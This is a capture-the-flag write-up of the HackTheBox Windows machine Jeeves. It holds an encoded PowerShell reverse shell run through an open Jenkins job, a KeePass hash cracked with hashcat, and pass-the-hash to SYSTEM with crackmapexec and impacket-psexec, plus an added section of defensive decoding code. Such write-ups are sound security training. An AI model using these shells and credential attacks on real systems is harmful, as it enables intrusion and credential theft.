
【HackTheBox】Jeeves WriteUp

Published 2023/03/01

Introduction

This time I'm working through Jeeves, a Windows machine. It looks like it runs Jenkins. Looking back it seems easy, but while I was doing it there was a lot I didn't understand.
https://app.hackthebox.com/machines/114

To-do list

  • Nmap port scan
  • Directory enumeration
  • Check the job submission screen inside Jenkins
  • Confirm that PowerShell commands can be run from a Jenkins job
  • Get a reverse shell (user flag)
  • There is a KeePass file, so examine it
  • Crack its password with hashcat
  • Check the passwords and the hash stored in KeePass
  • Confirm that the hash gets us SYSTEM privileges
  • Done (root flag)

Enumeration

Nmap

Let's start with a port scan.

nmap -sC -sV jeeves.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-28 06:53 EST
Nmap scan report for jeeves.htb (10.129.228.112)
Host is up (0.21s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-02-28T16:53:57
|_  start_date: 2023-02-28T16:48:22
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.25 seconds

We can tell it's a Windows machine. SMB looks suspicious.

Directory enumeration

Gobuster

HTTP port 80

gobuster dir -k -u http://jeeves.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

Nothing came up.

HTTP port 50000

gobuster dir -k -u http://jeeves.htb:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

/askjeeves            (Status: 302) [Size: 0] [--> http://jeeves.htb:50000/askjeeves/]
Progress: 220560 / 220561 (100.00%)

askjeeves looks interesting.

SMB port 445

smbmap -H jeeves.htb        
[!] Authentication error on jeeves.htb

Could not connect.

Checking HTTP

Port 80


Nothing in particular.

Port 50000

jeeves.htb:50000

Powered by Jetty:// 9.4.z-SNAPSHOT


jeeves.htb:50000/askjeeves/


It looks like we can submit jobs. This looks usable.

Jenkins version 2.87

Running a script

You can actually run scripts here. It was awkward to use for getting a reverse shell, so I didn't actually use it.

println "cmd /c whoami".execute().text

Build

Under New Item you can create a new job. Any name will do.

Let's try a Windows command.

We want to see some kind of result, so let's try whoami.


Build the job and check the console output: whoami ran successfully.

Foothold

Reverse Shell

Creating a job for the reverse shell

Grab the reverse shell payload from the following site:
https://www.revshells.com/ PowerShell#3 (Base64)

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwA5ACIALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

Add this to the job.
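As an added example (mine, not the author's), this is the kind of decoder a defender uses to triage a `powershell -e` command line like the one above when it turns up in a Jenkins build log or a process-creation event: the `-e` argument is base64 over the UTF-16LE text of the command, so decoding it and scanning for connect-back tokens makes such a job visible. The indicator list, the sample command and the 192.0.2.10 address are constructed for the example.

```python
import base64
import re
from typing import Optional

# Tokens that typically show up in PowerShell connect-back one-liners (like the
# payload in this writeup). Assumed for this example; not an exhaustive signature set.
SUSPICIOUS_TOKENS = (
    "System.Net.Sockets.TCPClient",
    ".GetStream(",
    "IEX ",
    "Invoke-Expression",
)

# Matches -e / -ec / -enc / -EncodedCommand followed by the base64 argument.
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_for_powershell(command: str) -> str:
    """Build the -e argument exactly as PowerShell expects it: base64 of UTF-16LE text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse the encoding; rejects non-base64 input and odd-length UTF-16 data."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2:
        raise ValueError("UTF-16LE payload has odd length; argument is truncated")
    return raw.decode("utf-16-le")


def extract_encoded_argument(command_line: str) -> Optional[str]:
    match = _ENC_FLAG.search(command_line)
    return match.group(1) if match else None


def triage(command_line: str) -> dict:
    """Decode an encoded PowerShell command line and list the indicators it contains."""
    b64 = extract_encoded_argument(command_line)
    if b64 is None:
        return {"encoded": False, "decoded": None, "indicators": []}
    decoded = decode_encoded_command(b64)
    lowered = decoded.lower()
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok.lower() in lowered]
    return {"encoded": True, "decoded": decoded, "indicators": hits}


# Constructed sample: a cut-down connect-back command (192.0.2.10 is a documentation
# address), encoded the way the Jenkins job in this writeup launched its payload.
SAMPLE_COMMAND = ('$c = New-Object System.Net.Sockets.TCPClient("192.0.2.10",4444);'
                  '$s = $c.GetStream();IEX $data')
SAMPLE_LOG_LINE = "powershell -e " + encode_for_powershell(SAMPLE_COMMAND)

if __name__ == "__main__":
    result = triage(SAMPLE_LOG_LINE)
    print(result["decoded"])
    print("indicators:", result["indicators"])
```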

nc listener

nc -lnvp 1234              
listening on [any] 1234 ...
connect to [10.10.14.39] from (UNKNOWN) [10.129.228.112] 49676
whoami
jeeves\kohsuke
PS C:\Users\Administrator\.jenkins\workspace\revshell> 

Got it!

Privilege Escalation

Enumeration

Checking net user

PS C:\Users\kohsuke\Desktop> net user

User accounts for \\JEEVES

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
kohsuke                  
The command completed successfully.

Nothing notable.

kohsuke/Documents

PS C:\Users\kohsuke\Documents> ls
    Directory: C:\Users\kohsuke\Documents
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        9/18/2017   1:43 PM           2846 CEH.kdbx                                                              

There's a .kdbx file. It looks like a KeePass database. It should contain passwords, so let's open it.

Getting the file onto our machine

Since Jenkins lets us download files from its workspace, we copy the file into a specific folder under it.

Directory: C:\Users\Administrator\.jenkins\workspace


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----         3/1/2023   4:56 AM                revshell                                                              
d-----         3/1/2023   4:47 AM                test                                                                  


Create a folder named tofu and copy the file from earlier into it.
PS C:\Users\Administrator\.jenkins\workspace\revshell\tofu>

Copying and downloading the file

PS C:\Users\Administrator\.jenkins\workspace\revshell\tofu> copy C:\Users\kohsuke\Documents\CEH.kdbx .

Hashcat

Let's crack it open with hashcat.

┌──(kali㉿kali)-[~/Downloads]
└─$ keepass2john CEH.kdbx
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

┌──(kali㉿kali)-[~/Downloads]
└─$ keepass2john CEH.kdbx > CEH.kdbx.hash
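As an added example that is not part of the original writeup, here is a small parser for the keepass2john line above: it splits the `$keepass$*2*…` fields, checks that each header field has the size a KDBX AES header should have, and flags the low AES-KDF round count, the setting that lets rockyou be exhausted in well under two hours at the 2598 H/s hashcat reports further down. The 100,000-round threshold is an assumption chosen for illustration, and the field names are mine.

```python
from dataclasses import dataclass

# The keepass2john line for CEH.kdbx, copied from the writeup above.
HASH_LINE = (
    "CEH:$keepass$*2*6000*0*"
    "1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*"
    "3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*"
    "393c97beafd8a820db9142a6a94f03f6*"
    "b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*"
    "cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48"
)

# Hex fields of a KDBX (version 2) line in output order with their byte sizes: master seed,
# AES-KDF transform seed, AES-CBC IV, expected plaintext start bytes, first 32 ciphertext bytes.
FIELD_SIZES = {"master_seed": 32, "transform_seed": 32, "iv": 16,
               "expected_start_bytes": 32, "first_encrypted_block": 32}

@dataclass
class KeePassHash:
    name: str
    version: int
    rounds: int       # AES-KDF transformation rounds (the work factor)
    algorithm: int    # 0 = AES in keepass2john's numbering
    fields: dict      # field name -> raw bytes, keys as in FIELD_SIZES

def parse_keepass2john(line: str) -> KeePassHash:
    """Split a keepass2john line into its fields and validate every field size."""
    name, _, payload = line.strip().partition(":")
    parts = payload.split("*")
    if len(parts) < 9 or parts[0] != "$keepass$":
        raise ValueError("not a keepass2john hash line")
    version, rounds, algorithm = int(parts[1]), int(parts[2]), int(parts[3])
    if version != 2:
        raise ValueError(f"only the KDBX (version 2) layout is handled, got {version}")
    fields = {}
    for key, hexval in zip(FIELD_SIZES, parts[4:9]):
        raw = bytes.fromhex(hexval)
        if len(raw) != FIELD_SIZES[key]:
            raise ValueError(f"{key}: expected {FIELD_SIZES[key]} bytes, got {len(raw)}")
        fields[key] = raw
    return KeePassHash(name, version, rounds, algorithm, fields)

def kdf_is_weak(h: KeePassHash, min_rounds: int = 100_000) -> bool:
    """Flag a low round count; 100,000 is an illustrative threshold, not a standard."""
    return h.rounds < min_rounds

def seconds_to_exhaust(h: KeePassHash, keyspace: int, rate_hs: float, rate_rounds: int) -> float:
    """Time to try a whole wordlist, given a rate measured at rate_rounds; KDF cost is linear in rounds."""
    return keyspace / (rate_hs * rate_rounds / h.rounds)
```

Passing the hashcat figures from this writeup (keyspace 14344385, 2598 H/s at 6000 rounds) gives roughly 5500 seconds for all of rockyou, and the estimate scales linearly with the round count.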

Run hashcat against the extracted hash file.

hashcat ~/Desktop/CEH.kdbx.hash /usr/share/wordlists/rockyou.txt --user -m 13400     
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-11th Gen Intel(R) Core(TM) i7-11700 @ 2.50GHz, 2918/5900 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Cracking performance lower than expected?                 

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea...47db48
Time.Started.....: Wed Mar  1 01:35:53 2023 (21 secs)
Time.Estimated...: Wed Mar  1 01:36:14 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     2598 H/s (8.17ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 55296/14344385 (0.39%)
Rejected.........: 0/55296 (0.00%)
Restore.Point....: 54272/14344385 (0.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:5888-6000
Candidate.Engine.: Device Generator
Candidates.#1....: 250895 -> grad2010
Hardware.Mon.#1..: Util:100%

Started: Wed Mar  1 01:35:47 2023
Stopped: Wed Mar  1 01:36:16 2023

Looking inside the KeePass database

The contents can be viewed with kpcli, so install it.

kpcli --kdb CEH.kdbx
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> find .
Searching for "." ...
 - 8 matches found and placed into /_found/
Would you like to list them now? [y/N] 
=== Entries ===
0. Backup stuff                                                           
1. Bank of America                                   www.bankofamerica.com
2. DC Recovery PW                                                         
3. EC-Council                               www.eccouncil.org/programs/cer
4. It's a secret                                 localhost:8180/secret.jsp
5. Jenkins admin                                            localhost:8080
6. Keys to the kingdom                                                    
7. Walmart.com                                             www.walmart.com

We already know from hashcat that the password is moonshine1.

Show every entry.

kpcli:/> show -f 0

 Path: /CEH/
Title: Backup stuff
Uname: ?
 Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
  URL: 
Notes: 

kpcli:/> show -f 1

 Path: /CEH/
Title: Bank of America
Uname: Michael321
 Pass: 12345
  URL: https://www.bankofamerica.com
Notes: 

kpcli:/> show -f 2

 Path: /CEH/
Title: DC Recovery PW
Uname: administrator
 Pass: S1TjAtJHKsugh9oC4VZl
  URL: 
Notes: 

kpcli:/> show -f 3

 Path: /CEH/
Title: EC-Council
Uname: hackerman123
 Pass: pwndyouall!
  URL: https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
Notes: Personal login

kpcli:/> show -f 4

 Path: /CEH/
Title: It's a secret
Uname: admin
 Pass: F7WhTrSFDKB6sxHU1cUn
  URL: http://localhost:8180/secret.jsp
Notes: 

kpcli:/> show -f 5

 Path: /CEH/
Title: Jenkins admin
Uname: admin
 Pass: 
  URL: http://localhost:8080
Notes: We don't even need creds! Unhackable! 

kpcli:/> show -f 6

 Path: /CEH/
Title: Keys to the kingdom
Uname: bob
 Pass: lCEUnYPjNfIuPZSzOySA
  URL: 
Notes: 

kpcli:/> show -f 7

 Path: /CEH/
Title: Walmart.com
Uname: anonymous
 Pass: Password
  URL: http://www.walmart.com
Notes: Getting my shopping on

Collecting the passwords

passwords

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
12345
S1TjAtJHKsugh9oC4VZl
pwndyouall!
F7WhTrSFDKB6sxHU1cUn
lCEUnYPjNfIuPZSzOySA
Password

Foothold

Crackmapexec

Try the password list against SMB.

crackmapexec smb jeeves.htb -u Administrator -p passwords
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if result['type'] is not 'searchResEntry':
SMB         jeeves.htb      445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 STATUS_LOGON_FAILURE 
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:12345 STATUS_LOGON_FAILURE 
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:S1TjAtJHKsugh9oC4VZl STATUS_LOGON_FAILURE 
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:pwndyouall! STATUS_LOGON_FAILURE 
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:F7WhTrSFDKB6sxHU1cUn STATUS_LOGON_FAILURE 
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:lCEUnYPjNfIuPZSzOySA STATUS_LOGON_FAILURE 
SMB         jeeves.htb      445    JEEVES           [-] Jeeves\Administrator:Password STATUS_LOGON_FAILURE 

Couldn't get in.

Checking the hash

There's a hash in the Pass field.

 Path: /CEH/
Title: Backup stuff
Uname: ?
 Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
  URL: 
Notes: 

It might be a hash of the kind used in Windows NTLM authentication.

Crackstation

https://crackstation.net/

No luck.

crackmapexec again

crackmapexec smb jeeves.htb -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if result['type'] is not 'searchResEntry':
SMB         jeeves.htb      445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB         jeeves.htb      445    JEEVES           [+] Jeeves\Administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)       

This still doesn't get us a shell.

Psexec

https://github.com/fortra/impacket
Pass the hash to impacket's psexec to get into the Windows machine.

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@jeeves.htb cmd.exe
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on jeeves.htb.....
[*] Found writable share ADMIN$
[*] Uploading file pgAKkTVF.exe
[*] Opening SVCManager on jeeves.htb.....
[*] Creating service hmME on jeeves.htb.....
[*] Starting service hmME.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32> 

We got SYSTEM privileges.

Desktop

Directory of C:\Users\Administrator\Desktop

03/01/2023  07:14 AM    <DIR>          .
03/01/2023  07:14 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
03/01/2023  07:14 AM                 0 ls
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)            833 bytes
               2 Dir(s)   2,638,098,432 bytes free

C:\Users\Administrator\Desktop> dir
The system cannot find the file specified.
 
C:\Users\Administrator\Desktop> type hm.txt
The flag is elsewhere.  Look deeper.

There's no root flag here. The file tells us to look deeper, so let's do that: run dir /R, which also lists alternate data streams.

 Directory of C:\Users\Administrator\Desktop

03/01/2023  07:14 AM    <DIR>          .
03/01/2023  07:14 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
03/01/2023  07:14 AM                 0 ls
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)            833 bytes
               2 Dir(s)   2,638,098,432 bytes free

root.txt is visible as an alternate data stream of hm.txt! So we redirect that stream into more.

Flag

C:\Users\Administrator\Desktop> more < hm.txt:root.txt

References

https://0xdf.gitlab.io/2022/04/14/htb-jeeves.html
